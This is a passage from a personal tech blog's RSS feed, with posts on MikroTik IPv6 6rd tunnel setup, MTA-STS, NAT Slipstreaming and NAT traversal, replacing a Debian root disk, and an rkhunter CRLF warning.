  2615.    sent=1 received=1 packet-loss=0% min-rtt=1ms avg-rtt=1ms max-rtt=1ms</pre>
  2616.  
  2617. <p>Sunrise doesn't offer native IPv6 connectivity but employs 6rd (which defines how to create a 6to4 tunnel based on the public IPv4 address, an IPv6 prefix and the tunnel gateway).</p>
  2618. <p>Before we setup the 6rd tunnel, it's important to put in place firewall rules for IPv6 as afterwards all devices on the local network will receive a public IPv6 address.</p>
  2619. <pre>/ipv6 firewall filter
  2620. add action=accept chain=forward connection-state=established,related
  2621. add action=accept chain=forward in-interface=LAN
  2622. add action=drop chain=forward
  2623. add action=accept chain=input connection-state=established,related
  2624. add action=accept chain=input protocol=icmpv6
  2625. add action=drop chain=input</pre>
  2626.  
  2627. <p>To setup the 6rd tunnel, I've modified an existing script with the specific parameters for Sunrise (namely the <kbd>2001:1710::/28</kbd> prefix and the <kbd>212.161.209.1</kbd> tunnel gateway address).<br>The script creates the tunnel interface, configures an IPv6 address on the external interface, configures an IPv6 address on the internal interface (which also enables SLAAC to provide IPv6 addresses to the clients on the local network) and configures an IPv6 default route over the 6rd tunnel.</p>
  2628. <p>The script itself will be run via the scheduler, thus let's save it under the name <kbd>6rd-script</kbd>.</p>
  2629. <pre>
  2630. :global ipv6localinterface "LAN"
  2631. :global uplinkinterface "sunrise"
  2632.  
  2633. :global IPv4addr [/ip address get [find interface=$uplinkinterface] address];
  2634. :global IPv4addr [:pick $IPv4addr 0 [:find $IPv4addr "/"]]
  2635. :global IPv4addr2 [:pick $IPv4addr 0 30]
  2636. :global IPv6temp [:toip6 ("1::" . $IPv4addr2)]
  2637.  
  2638. :global IPv4hex1 [:pick $IPv6temp 3 4]
  2639. :global IPv4hex2 [:pick $IPv6temp 4 7]
  2640. :global IPv4hex3 [:pick $IPv6temp 8 9]
  2641. :global IPv4hex4 [:pick $IPv6temp 9 12]
  2642. :global IPv6addr [("2001:171" . $IPv4hex1 . ":". $IPv4hex2 .$IPv4hex3 . ":" . $IPv4hex4 . "0::1/64")]
  2643. :global IPv6addrLoc [("2001:171" . $IPv4hex1 . ":". $IPv4hex2 . $IPv4hex3 . ":" . $IPv4hex4 . "1::1/64")]
  2644.  
  2645. #6to4 interface
  2646. :global 6to4id [/interface 6to4 find where name="6rd"]
  2647. :if ($6to4id!="") do={
  2648. :global 6to4addr [/interface 6to4 get $6to4id local-address]
  2649. if ($6to4addr != $IPv4addr) do={ :log warning "Updating local-address for 6to4 tunnel '6rd' from '$6to4addr' to '$IPv4addr'."; /interface 6to4 set [find name="6rd"] local-address=$IPv4addr }
  2650. } else { :log warning "Creating 6to4 interface '6rd'. "; /interface 6to4 add !keepalive local-address=$IPv4addr mtu=1480 name="6rd" remote-address=212.161.209.1 }
  2651.  
  2652. #ipv6 for uplink
  2653. :global IPv6addrnumber [/ipv6 address find where comment="6rd" and interface="6rd"]
  2654. :if ($IPv6addrnumber!="") do={
  2655. :global oldip ([/ipv6 address get $IPv6addrnumber address])
  2656. if ($oldip != $IPv6addr) do={ :log warning "Updating 6rd IPv6 from '$oldip' to '$IPv6addr'."; /ipv6 address set number=$IPv6addrnumber address=$IPv6addr disabled=no }
  2657. } else {:log warning "Setting up 6rd IPv6 '$IPv6addr' to '6rd'. "; /ipv6 address add address=$IPv6addr interface="6rd" comment="6rd" advertise=no }
  2658.  
  2659. #ipv6 for local
  2660. :global IPv6addrnumberLocal [/ipv6 address find where comment=("6rd_local") and interface=$ipv6localinterface]
  2661. :if ($IPv6addrnumberLocal!="") do={
  2662. :global oldip ([/ipv6 address get $IPv6addrnumberLocal address])
  2663. if ($oldip != $IPv6addrLoc) do={ :log warning "Updating 6rd LOCAL IPv6 from '$oldip' to '$IPv6addrLoc'."; /ipv6 address set number=$IPv6addrnumberLocal address=$IPv6addrLoc disabled=no }
  2664. } else {:log warning "Setting up 6rd LOCAL IPv6 '$IPv6addrLoc' na '$ipv6localinterface'. "; /ipv6 address add address=$IPv6addrLoc interface=$ipv6localinterface comment="6rd_local" advertise=yes }
  2665.  
  2666. #ipv6 route
  2667. :global routa [/ipv6 route find where dst-address="2000::/3" and gateway="6rd"]
  2668. if ($routa="") do={ :log warning "Setting IPv6 route '2000::/3' pres '6rd'. "; /ipv6 route add distance=1 dst-address="2000::/3" gateway="6rd" }
  2669. </pre>
  2670.  
  2671. <p>Once we've added the script we also need to create the scheduler entry to run it periodically (as it needs to re-configure the tunnel and addresses whenever the public IPv4 address changes).</p>
  2672. <pre>/system scheduler add interval=1m name=schedule1 on-event=6rd-script</pre>
  2673.  
  2674. <p>After the first run of the script we should now have IPv6 connectivity. Let's test this again by checking that we have a public IPv6 address, an IPv6 default route and can ping an IPv6 host in the Internet.</p>
  2675.  
  2676. <pre>/ipv6 address print where interface=6rd and global
  2677. Flags: X - disabled, I - invalid, D - dynamic, G - global, L - link-local
  2678. #    ADDRESS                                     FROM-POOL INTERFACE        ADVERTISE
  2679. 0  G ;;; 6rd
  2680.      2001:171c:6336:47b0::1/64                             6rd              no</pre>
  2681. <pre>/ipv6 route check 2600::
  2682.     status: ok
  2683.  interface: 6rd
  2684.    nexthop: 2600::</pre>
  2685. <pre>/ping count=1 2600::
  2686.  SEQ HOST                                     SIZE TTL TIME  STATUS
  2687.    0 2600::                                     56  50 118ms echo reply
  2688.    sent=1 received=1 packet-loss=0% min-rtt=118ms avg-rtt=118ms max-rtt=118ms</pre>
  2689.  
  2690. <p>And that's how you can configure and validate IPv4 and IPv6 connectivity with your own router on a Sunrise fiber line despite them not liking it very much ;-)</p>
  2691. ]]></content:encoded>
  2692.  </item>
  2693.  
  2694.  <item>
  2695.    <title>MTA-STS</title>
  2696.    <link>https://blog.x-way.org/Networking/2020/11/21/MTA-STS.html</link>
  2697.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324282</guid>
  2698.    <dc:creator>Andreas Jaggi</dc:creator>
  2699.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  2700.    <pubDate>Sat, 21 Nov 2020 09:47:00 +0000</pubDate>
  2701.    <category domain="https://blog.x-way.org/Networking">Networking</category>
  2702.    <description><![CDATA[<p>Recently I added <a href="https://en.wikipedia.org/wiki/Simple_Mail_Transfer_Protocol#SMTP_MTA_Strict_Transport_Security" title="SMTP MTA Strict-Transport-Security">MTA-STS</a> support to one of my domains, and it turns out that this was easier than expected.</p>
  2703. <p>MTA-STS is used to tell mail senders that your server supports TLS. And then you can define the policy for your server and tell them that they should only use TLS (resp. STARTTLS) when connecting to you and not fall back to unencrypted SMTP.</p>
  2704. <p>The way this works is with two components:</p>
  2705. <ul>
  2706. <li>a special <code>_mta-sts.&lt;your-site.com&gt;</code> TXT DNS entry indicating that your domain supports MTA-STS and the version number of your MTA-STS policy</li>
  2707. <li>a mta-sts.txt file served under a specific well-known URL <code>https://mta-sts.&lt;your-site.com&gt;/.well-known/mta-sts.txt</code> containing your MTA-STS policy (which mx hosts it is valid for, should it be run in enforcing or testing mode, max-age etc.)</li>
  2708. </ul>
  2709. <p>The idea is that a mail sender checks your MTA-STS policy through protected channels (DNSSEC, HTTPS) and then never sends mails to you in plaintext (similar approach as <a href="https://en.wikipedia.org/wiki/HTTP_Strict_Transport_Security" title="HTTP Strict Transport Security">HSTS</a> for HTTP but this time between mail servers).</p>
  2710.  
  2711. <p>To setup the MTA-STS configuration, I followed this <a href="https://www.naut.ca/blog/2020/04/07/mta-sts-in-5-minutes/" title="Enable MTA-STS in 5 Minutes with NGINX">Enable MTA-STS in 5 Minutes with NGINX</a> guide from <a href="https://www.naut.ca/" title="Home - Yoonsik Park">Yoonsik Park</a>.</p>
  2712. <p>Then to check my configuration I used this <a href="https://aykevl.nl/apps/mta-sts/" title="MTA-STS validator">MTA-STS validator</a> (which is an opensource project available on <a href="https://github.com/aykevl/mta-sts" title="GitHub - aykevl/mta-sts: Online tool for MTA-STS checking: https://aykevl.nl/apps/mta-sts/">GitHub</a>), the classic <a href="https://www.checktls.com/TestReceiver" title="//email/testTo:">checktls.com //email/testTo: tool</a> (MTA-STS checking needs to be explicitly enabled under 'More Options') and the free testing service provided by <a href="https://www.hardenize.com/" title="Harenize: Comprehensive web site configuration test">Hardenize</a>.</p>
  2713. ]]></description>
  2714.    <content:encoded><![CDATA[<p>Recently I added <a href="https://en.wikipedia.org/wiki/Simple_Mail_Transfer_Protocol#SMTP_MTA_Strict_Transport_Security" title="SMTP MTA Strict-Transport-Security">MTA-STS</a> support to one of my domains, and it turns out that this was easier than expected.</p>
  2715. <p>MTA-STS is used to tell mail senders that your server supports TLS. And then you can define the policy for your server and tell them that they should only use TLS (resp. STARTTLS) when connecting to you and not fall back to unencrypted SMTP.</p>
  2716. <p>The way this works is with two components:</p>
  2717. <ul>
  2718. <li>a special <code>_mta-sts.&lt;your-site.com&gt;</code> TXT DNS entry indicating that your domain supports MTA-STS and the version number of your MTA-STS policy</li>
  2719. <li>a mta-sts.txt file served under a specific well-known URL <code>https://mta-sts.&lt;your-site.com&gt;/.well-known/mta-sts.txt</code> containing your MTA-STS policy (which mx hosts it is valid for, should it be run in enforcing or testing mode, max-age etc.)</li>
  2720. </ul>
  2721. <p>The idea is that a mail sender checks your MTA-STS policy through protected channels (DNSSEC, HTTPS) and then never sends mails to you in plaintext (similar approach as <a href="https://en.wikipedia.org/wiki/HTTP_Strict_Transport_Security" title="HTTP Strict Transport Security">HSTS</a> for HTTP but this time between mail servers).</p>
  2722.  
  2723. <p>To setup the MTA-STS configuration, I followed this <a href="https://www.naut.ca/blog/2020/04/07/mta-sts-in-5-minutes/" title="Enable MTA-STS in 5 Minutes with NGINX">Enable MTA-STS in 5 Minutes with NGINX</a> guide from <a href="https://www.naut.ca/" title="Home - Yoonsik Park">Yoonsik Park</a>.</p>
  2724. <p>Then to check my configuration I used this <a href="https://aykevl.nl/apps/mta-sts/" title="MTA-STS validator">MTA-STS validator</a> (which is an opensource project available on <a href="https://github.com/aykevl/mta-sts" title="GitHub - aykevl/mta-sts: Online tool for MTA-STS checking: https://aykevl.nl/apps/mta-sts/">GitHub</a>), the classic <a href="https://www.checktls.com/TestReceiver" title="//email/testTo:">checktls.com //email/testTo: tool</a> (MTA-STS checking needs to be explicitly enabled under 'More Options') and the free testing service provided by <a href="https://www.hardenize.com/" title="Harenize: Comprehensive web site configuration test">Hardenize</a>.</p>
  2725. ]]></content:encoded>
  2726.  </item>
  2727.  
  2728.  <item>
  2729.    <title>15 years of o5</title>
  2730.    <link>https://blog.x-way.org/Webdesign/2020/11/01/15-years-of-o5.html</link>
  2731.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324281</guid>
  2732.    <dc:creator>Andreas Jaggi</dc:creator>
  2733.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  2734.    <pubDate>Sun, 01 Nov 2020 19:03:00 +0000</pubDate>
  2735.    <category domain="https://blog.x-way.org/Webdesign">Webdesign</category>
  2736.    <description><![CDATA[<p><a href="https://blog.x-way.org/Webdesign/2005/11/01/CSS-Reboot-Fall-2005.html" title="x-log - CSS Reboot Fall 2005">15 years ago</a> this weblog received the current o5 design (or theme as it would be called nowadays).<br>
  2737. During this time the design has aged quite well and also survived <a href="https://blog.x-way.org/Misc/2011/11/26/Online-Again.html" title="x-log - Online Again">the move</a> of the backend from a self-written PHP blog-engine to Jekyll.</p>
  2738. <p>Although it still works surprisingly well and presents the content nicely every day, there are some parts where better usage of contemporary technologies would be desirable.<br>It has no mobile version nor a responsive layout as the design was created before the now omnipresent smartphones were invented. Similar is the font-size hardcoded and not very adequate for todays retina displays. And yes, it uses the XHTML 1.0 strict standard with all its quirks and CSS tricks from 2002 (which luckily are still supported in current browsers).</p>
  2739. <p>Overall I'm quite happy that the o5 design has turned out to be so timeless and that I did not have to come up with a new one every other year (btw: I don't remember where the o5 name came from, likely the 5 is a reference to 2005 when it was created).</p>
  2740. <p>With the current Corona situation forcing me to spend more time at home again, I have the feeling that some things might change around the weblog (not quite sure what or when exactly, first I need to re-learn how websites are built in 2020 :-).</p>
  2741. ]]></description>
  2742.    <content:encoded><![CDATA[<p><a href="https://blog.x-way.org/Webdesign/2005/11/01/CSS-Reboot-Fall-2005.html" title="x-log - CSS Reboot Fall 2005">15 years ago</a> this weblog received the current o5 design (or theme as it would be called nowadays).<br>
  2743. During this time the design has aged quite well and also survived <a href="https://blog.x-way.org/Misc/2011/11/26/Online-Again.html" title="x-log - Online Again">the move</a> of the backend from a self-written PHP blog-engine to Jekyll.</p>
  2744. <p>Although it still works surprisingly well and presents the content nicely every day, there are some parts where better usage of contemporary technologies would be desirable.<br>It has no mobile version nor a responsive layout as the design was created before the now omnipresent smartphones were invented. Similar is the font-size hardcoded and not very adequate for todays retina displays. And yes, it uses the XHTML 1.0 strict standard with all its quirks and CSS tricks from 2002 (which luckily are still supported in current browsers).</p>
  2745. <p>Overall I'm quite happy that the o5 design has turned out to be so timeless and that I did not have to come up with a new one every other year (btw: I don't remember where the o5 name came from, likely the 5 is a reference to 2005 when it was created).</p>
  2746. <p>With the current Corona situation forcing me to spend more time at home again, I have the feeling that some things might change around the weblog (not quite sure what or when exactly, first I need to re-learn how websites are built in 2020 :-).</p>
  2747. ]]></content:encoded>
  2748.  </item>
  2749.  
  2750.  <item>
  2751.    <title>NAT Slipstreaming (NAT traversal part 2)</title>
  2752.    <link>https://blog.x-way.org/Networking/2020/10/31/NAT-Slipstreaming.html</link>
  2753.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324280</guid>
  2754.    <dc:creator>Andreas Jaggi</dc:creator>
  2755.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  2756.    <pubDate>Sat, 31 Oct 2020 22:55:00 +0000</pubDate>
  2757.    <category domain="https://blog.x-way.org/Networking">Networking</category>
  2758.    <description><![CDATA[<p>Compared to the <a href="https://blog.x-way.org/Networking/2020/08/23/How-NAT-traversal-works.html" title="x-log - How NAT traversal works">previous post</a> where intentional NAT traversal was discussed, here now comes an article about 'unintentional' (malicious) NAT traversal.</p>
  2759. <p><a href="https://samy.pl/" title="Samy Kamar">Samy Kamar</a> describes in his <a href="https://samy.pl/slipstream/" title="Samy Kamar - NAT Slipstreaming">NAT Slipstreaming article</a> how a combination of TCP packet segmentation and smuggling SIP requests in HTTP, can be used to trick the NAT <abbr title="Application Layer Gateway">ALG</abbr> of your router into opening arbitrary ports for inbound connections from the Internet to your computer.</p>
  2760. <p>The article analyses in detail the SIP ALG of the Linux netfilter stack in it's default configuration, but likely similar attacks could also be possible with ALGs of other protocols and vendors.</p>
  2761. <p>Important to note: the Linux SIP ALG module has two parameters (sip_direct_media and sip_direct_signalling), which restrict the IP address for which additional ports are opened to the one sending the original SIP packet. By default they are set to 1, but if any of these is set to 0 in a router's configuration, the described NAT Slipstreaming attack will not only allow to make inbound connections to your computer, but also to any other device in the local network!</p>
  2762. ]]></description>
  2763.    <content:encoded><![CDATA[<p>Compared to the <a href="https://blog.x-way.org/Networking/2020/08/23/How-NAT-traversal-works.html" title="x-log - How NAT traversal works">previous post</a> where intentional NAT traversal was discussed, here now comes an article about 'unintentional' (malicious) NAT traversal.</p>
  2764. <p><a href="https://samy.pl/" title="Samy Kamar">Samy Kamar</a> describes in his <a href="https://samy.pl/slipstream/" title="Samy Kamar - NAT Slipstreaming">NAT Slipstreaming article</a> how a combination of TCP packet segmentation and smuggling SIP requests in HTTP, can be used to trick the NAT <abbr title="Application Layer Gateway">ALG</abbr> of your router into opening arbitrary ports for inbound connections from the Internet to your computer.</p>
  2765. <p>The article analyses in detail the SIP ALG of the Linux netfilter stack in it's default configuration, but likely similar attacks could also be possible with ALGs of other protocols and vendors.</p>
  2766. <p>Important to note: the Linux SIP ALG module has two parameters (sip_direct_media and sip_direct_signalling), which restrict the IP address for which additional ports are opened to the one sending the original SIP packet. By default they are set to 1, but if any of these is set to 0 in a router's configuration, the described NAT Slipstreaming attack will not only allow to make inbound connections to your computer, but also to any other device in the local network!</p>
  2767. ]]></content:encoded>
  2768.  </item>
  2769.  
  2770.  <item>
  2771.    <title>How NAT traversal works</title>
  2772.    <link>https://blog.x-way.org/Networking/2020/08/23/How-NAT-traversal-works.html</link>
  2773.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324279</guid>
  2774.    <dc:creator>Andreas Jaggi</dc:creator>
  2775.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  2776.    <pubDate>Sun, 23 Aug 2020 21:08:00 +0000</pubDate>
  2777.    <category domain="https://blog.x-way.org/Networking">Networking</category>
  2778.    <description><![CDATA[<p><a href="https://tailscale.com/blog/how-nat-traversal-works/" title="How NAT traversal works - Tailscale Blog">How NAT traversal works</a> &ndash; is a very well written and detailed article from <a href="https://twitter.com/dave_universetf" title="Dave Anderson (@dave_universetf)">Dave Anderson</a> explaining the different NAT scenarios and the tricks that can be used to establish a peer-to-peer UDP connection between machines sitting behind them.</p>
  2779. ]]></description>
  2780.    <content:encoded><![CDATA[<p><a href="https://tailscale.com/blog/how-nat-traversal-works/" title="How NAT traversal works - Tailscale Blog">How NAT traversal works</a> &ndash; is a very well written and detailed article from <a href="https://twitter.com/dave_universetf" title="Dave Anderson (@dave_universetf)">Dave Anderson</a> explaining the different NAT scenarios and the tricks that can be used to establish a peer-to-peer UDP connection between machines sitting behind them.</p>
  2781. ]]></content:encoded>
  2782.  </item>
  2783.  
  2784.  <item>
  2785.    <title>Replace the root disk</title>
  2786.    <link>https://blog.x-way.org/Linux/2020/06/07/Replace-the-root-disk.html</link>
  2787.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324278</guid>
  2788.    <dc:creator>Andreas Jaggi</dc:creator>
  2789.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  2790.    <pubDate>Sun, 07 Jun 2020 10:58:00 +0000</pubDate>
  2791.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  2792.    <description><![CDATA[<p>Recently the disk holding the root (<kbd>/</kbd>) filesystem on one of my linux systems started to report increased <a href="https://en.wikipedia.org/wiki/S.M.A.R.T." title="S.M.A.R.T - Wikipedia">SMART</a> raw read error rates, seek error rates and ECC recovered hardware errors.</p>
  2793. <p>As these are early indications of a failing disk, it became time to replace the disk.</p>
  2794. <p>Normally replacing a disk comes down to plugging in the new one, coyping over the data, umount the old disk, mount the new one in place, unplug the old disk.<br>But when it is the disk with the root filesystem a couple extra steps are needed.</p>
  2795. <p>The steps below worked for my Debian system without problems (even used the opportunity to upgrade to an SSD :-)</p>
  2796. <p>(source is <a href="https://unix.stackexchange.com/questions/338387/how-do-i-replace-root-drive-on-debian" title="How do I replace Root Drive on Debian?">this thread</a> on StackExchange)</p>
  2797.  
  2798. <blockquote>
  2799. <p>The following makes some assumptions:</p>
  2800. <ul>
  2801. <li>All commands ran as root when possible</li>
  2802. <li>You are on a physical console to the host (need to type in grub commands to boot up the new disk!)</li>
  2803. <li>You want an ext4 files system</li>
  2804. <li>You are loosely familiar on a basic level with all commands run</li>
  2805. <li>You are NOT booting from a RAID device</li>
  2806. </ul>
  2807. <p>So here we go.</p>
  2808. <ol>
  2809. <li>Physically install new disk into computer and connect to available port leaving old disk in existing position.</li>
  2810. <li>Boot computer into old OS.</li>
  2811. <li>Prepare and mount new disk; first identify new disk<br>
  2812. <kbd>fdisk -l</kbd>
  2813. </li>
  2814. <li>Partition new disk<br>
  2815. <kbd>fdisk /dev/(newdisk)</kbd><br>
  2816. Make partition primary partition with type "83" file system type.
  2817. </li>
  2818. <li>Create filesystem<br>
  2819. <kbd>mkfs.ext4 /dev/(newpartition)</kbd>
  2820. </li>
  2821. <li>Mount new filesystem<br>
  2822. <kbd>mkdir /mnt/(newpartitionmountpoint)</kbd><br>
  2823. <kbd>mount /dev/(newpartition) /mnt/(newpartitionmountpoint)</kbd>
  2824. </li>
  2825. <li>Copy disk:<br>
  2826. <kbd>/sbin/init 1</kbd> (drop to single user mode)<br>
  2827. <kbd>rsync -avxHAX / /mnt/(newpartitionmountpoint)</kbd>
  2828. </li>
  2829. <li>Update FSTAB on newdisk<br>
  2830. <kbd>blkid</kbd> (note UUID of new partition)<br>
  2831. <kbd>vi /mnt/(newpartitionmountpoint)/etc/fstab</kbd><br>
  2832. Replace existing UUID of / in FSTAB to new disk UUID
  2833. </li>
  2834. <li>Configure grub and install to new disk boot loader:<br>
  2835. <kbd>grub-mkconfig</kbd><br>
  2836. <kbd>update-grub</kbd><br>
  2837. <kbd>grub-install /dev/(newdisk)</kbd>
  2838. </li>
  2839. <li>Copy grub.cfg from old disk to new<br>
  2840. <kbd>cp -ax /boot/grub/grub.cfg /mnt/(newpartitionmountpoint)/boot/grub/grub.cfg</kbd>
  2841. </li>
  2842. <li>Open grub.cfg on new disk and replace all UUIDs with new disk<br>
  2843. <kbd>vi /mnt/(newpartitionmountpoint)/boot/grub/grub.cfg</kbd><br>
  2844. Replace all old UUIDs with the UUID of the new disk
  2845. </li>
  2846. <li>Shut down computer<br>
  2847. <kbd>shutdown</kbd>
  2848. </li>
  2849. <li>Physically move the new drive to the 1st drive location and remove old drive</li>
  2850. <li>Start computer and grub should present:<br>
  2851. <pre>error: no such device: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx
  2852.  
  2853. GRUB rescue&gt;</pre>
  2854. </li>
  2855. <li>Manually boot new OS from grub; first identify the drive and partition of the boot files<br>
  2856. <kbd>ls</kbd> [to identify your drive and partition options]<br>
  2857. <kbd>ls (hdx,p)/</kbd> [to identify which partition has the /boot folder]
  2858. </li>
  2859. <li>Then, you can load the boot menu manually from the drive and partition you found above. Typically this would be (hd0,msdos1).<br>
  2860. <kbd>set prefix="(hdx,p)/boot/grub"</kbd><br>
  2861. <kbd>set root="(hdx,p)"</kbd><br>
  2862. <kbd>insmod normal</kbd><br>
  2863. <kbd>normal</kbd>
  2864. </li>
  2865. <li>Login to OS on new drive</li>
  2866. <li>Configure grub again<br>
  2867. <kbd>fdisk -l</kbd> (note dev of newdisk)<br>
  2868. <kbd>grub-mkconfig</kbd><br>
  2869. <kbd>update-grub</kbd><br>
  2870. <kbd>grub-install /dev/newdisk</kbd>
  2871. </li>
  2872. </ol>
  2873. <p>And that should be it!</p>
  2874. </blockquote>
  2875. ]]></description>
  2876.    <content:encoded><![CDATA[<p>Recently the disk holding the root (<kbd>/</kbd>) filesystem on one of my linux systems started to report increased <a href="https://en.wikipedia.org/wiki/S.M.A.R.T." title="S.M.A.R.T - Wikipedia">SMART</a> raw read error rates, seek error rates and ECC recovered hardware errors.</p>
  2877. <p>As these are early indications of a failing disk, it became time to replace the disk.</p>
  2878. <p>Normally replacing a disk comes down to plugging in the new one, coyping over the data, umount the old disk, mount the new one in place, unplug the old disk.<br>But when it is the disk with the root filesystem a couple extra steps are needed.</p>
  2879. <p>The steps below worked for my Debian system without problems (even used the opportunity to upgrade to an SSD :-)</p>
  2880. <p>(source is <a href="https://unix.stackexchange.com/questions/338387/how-do-i-replace-root-drive-on-debian" title="How do I replace Root Drive on Debian?">this thread</a> on StackExchange)</p>
  2881.  
  2882. <blockquote>
  2883. <p>The following makes some assumptions:</p>
  2884. <ul>
  2885. <li>All commands ran as root when possible</li>
  2886. <li>You are on a physical console to the host (need to type in grub commands to boot up the new disk!)</li>
  2887. <li>You want an ext4 files system</li>
  2888. <li>You are loosely familiar on a basic level with all commands run</li>
  2889. <li>You are NOT booting from a RAID device</li>
  2890. </ul>
  2891. <p>So here we go.</p>
  2892. <ol>
  2893. <li>Physically install new disk into computer and connect to available port leaving old disk in existing position.</li>
  2894. <li>Boot computer into old OS.</li>
  2895. <li>Prepare and mount new disk; first identify new disk<br>
  2896. <kbd>fdisk -l</kbd>
  2897. </li>
  2898. <li>Partition new disk<br>
  2899. <kbd>fdisk /dev/(newdisk)</kbd><br>
  2900. Make partition primary partition with type "83" file system type.
  2901. </li>
  2902. <li>Create filesystem<br>
  2903. <kbd>mkfs.ext4 /dev/(newpartition)</kbd>
  2904. </li>
  2905. <li>Mount new filesystem<br>
  2906. <kbd>mkdir /mnt/(newpartitionmountpoint)</kbd><br>
  2907. <kbd>mount /dev/(newpartition) /mnt/(newpartitionmountpoint)</kbd>
  2908. </li>
  2909. <li>Copy disk:<br>
  2910. <kbd>/sbin/init 1</kbd> (drop to single user mode)<br>
  2911. <kbd>rsync -avxHAX / /mnt/(newpartitionmountpoint)</kbd>
  2912. </li>
  2913. <li>Update FSTAB on newdisk<br>
  2914. <kbd>blkid</kbd> (note UUID of new partition)<br>
  2915. <kbd>vi /mnt/(newpartitionmountpoint)/etc/fstab</kbd><br>
  2916. Replace existing UUID of / in FSTAB to new disk UUID
  2917. </li>
  2918. <li>Configure grub and install to new disk boot loader:<br>
  2919. <kbd>grub-mkconfig</kbd><br>
  2920. <kbd>update-grub</kbd><br>
  2921. <kbd>grub-install /dev/(newdisk)</kbd>
  2922. </li>
  2923. <li>Copy grub.cfg from old disk to new<br>
  2924. <kbd>cp -ax /boot/grub/grub.cfg /mnt/(newpartitionmountpoint)/boot/grub/grub.cfg</kbd>
  2925. </li>
  2926. <li>Open grub.cfg on new disk and replace all UUIDs with new disk<br>
  2927. <kbd>vi /mnt/(newpartitionmountpoint)/boot/grub/grub.cfg</kbd><br>
  2928. Replace all old UUIDs with the UUID of the new disk
  2929. </li>
  2930. <li>Shut down computer<br>
  2931. <kbd>shutdown</kbd>
  2932. </li>
  2933. <li>Physically move the new drive to the 1st drive location and remove old drive</li>
  2934. <li>Start computer and grub should present:<br>
  2935. <pre>error: no such device: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx
  2936.  
  2937. GRUB rescue&gt;</pre>
  2938. </li>
  2939. <li>Manually boot new OS from grub; first identify the drive and partition of the boot files<br>
  2940. <kbd>ls</kbd> [to identify your drive and partition options]<br>
  2941. <kbd>ls (hdx,p)/</kbd> [to identify which partition has the /boot folder]
  2942. </li>
  2943. <li>Then, you can load the boot menu manually from the drive and partition you found above. Typically this would be (hd0,msdos1).<br>
  2944. <kbd>set prefix="(hdx,p)/boot/grub"</kbd><br>
  2945. <kbd>set root="(hdx,p)"</kbd><br>
  2946. <kbd>insmod normal</kbd><br>
  2947. <kbd>normal</kbd>
  2948. </li>
  2949. <li>Login to OS on new drive</li>
  2950. <li>Configure grub again<br>
  2951. <kbd>fdisk -l</kbd> (note dev of newdisk)<br>
  2952. <kbd>grub-mkconfig</kbd><br>
  2953. <kbd>update-grub</kbd><br>
  2954. <kbd>grub-install /dev/newdisk</kbd>
  2955. </li>
  2956. </ol>
  2957. <p>And that should be it!</p>
  2958. </blockquote>
  2959. ]]></content:encoded>
  2960.  </item>
  2961.  
  2962.  <item>
  2963.    <title>rkhunter CRLF confusion</title>
  2964.    <link>https://blog.x-way.org/Linux/2020/05/24/rkhunter-CRLF-confusion.html</link>
  2965.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324277</guid>
  2966.    <dc:creator>Andreas Jaggi</dc:creator>
  2967.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  2968.    <pubDate>Sun, 24 May 2020 11:22:00 +0000</pubDate>
  2969.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  2970.    <description><![CDATA[<p>On my Linux hosts I'm running <a href="http://rkhunter.sourceforge.net/" title="The Rootkit Hunter project">rkhunter</a>. On a newly configured host it lately reported the following warning:</p>
  2971. <pre>Warning: The SSH and rkhunter configuration options should be the same:
  2972.        SSH configuration option 'PermitRootLogin': no
  2973. Rkhunter configuration option 'ALLOW_SSH_ROOT_USER': no</pre>
  2974. <p>On first sight the warning does not seem to make much sense, as both configuration options seem to be set to the same value (<code>no</code>).<br>
  2975. But digging further reveals that they are stored slightly different:</p>
  2976. <pre># file /etc/rkhunter.conf
  2977. /etc/rkhunter.conf: ASCII text
  2978. # file /etc/ssh/sshd_config
  2979. /etc/ssh/sshd_config: ASCII text, with CRLF line terminators</pre>
  2980. <p>Turns out that rkhunter is also checking the line terminators as part of the configuration values, and warns because they are different.</p>
  2981. <p>Knowing this, the fix is simple: run <a href="http://dos2unix.sourceforge.net/" title="dos2unix">dos2unix</a> on the CRLF file</p>
  2982. ]]></description>
  2983.    <content:encoded><![CDATA[<p>On my Linux hosts I'm running <a href="http://rkhunter.sourceforge.net/" title="The Rootkit Hunter project">rkhunter</a>. On a newly configured host it lately reported the following warning:</p>
  2984. <pre>Warning: The SSH and rkhunter configuration options should be the same:
  2985.        SSH configuration option 'PermitRootLogin': no
  2986. Rkhunter configuration option 'ALLOW_SSH_ROOT_USER': no</pre>
  2987. <p>On first sight the warning does not seem to make much sense, as both configuration options seem to be set to the same value (<code>no</code>).<br>
  2988. But digging further reveals that they are stored slightly different:</p>
  2989. <pre># file /etc/rkhunter.conf
  2990. /etc/rkhunter.conf: ASCII text
  2991. # file /etc/ssh/sshd_config
  2992. /etc/ssh/sshd_config: ASCII text, with CRLF line terminators</pre>
  2993. <p>Turns out that rkhunter is also checking the line terminators as part of the configuration values, and warns because they are different.</p>
  2994. <p>Knowing this, the fix is simple: run <a href="http://dos2unix.sourceforge.net/" title="dos2unix">dos2unix</a> on the CRLF file</p>
  2995. ]]></content:encoded>
  2996.  </item>
  2997.  
  2998.  <item>
  2999.    <title>ipaddr CLI tool</title>
  3000.    <link>https://blog.x-way.org/Networking/2020/05/21/ipaddr-CLI-tool.html</link>
  3001.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324276</guid>
  3002.    <dc:creator>Andreas Jaggi</dc:creator>
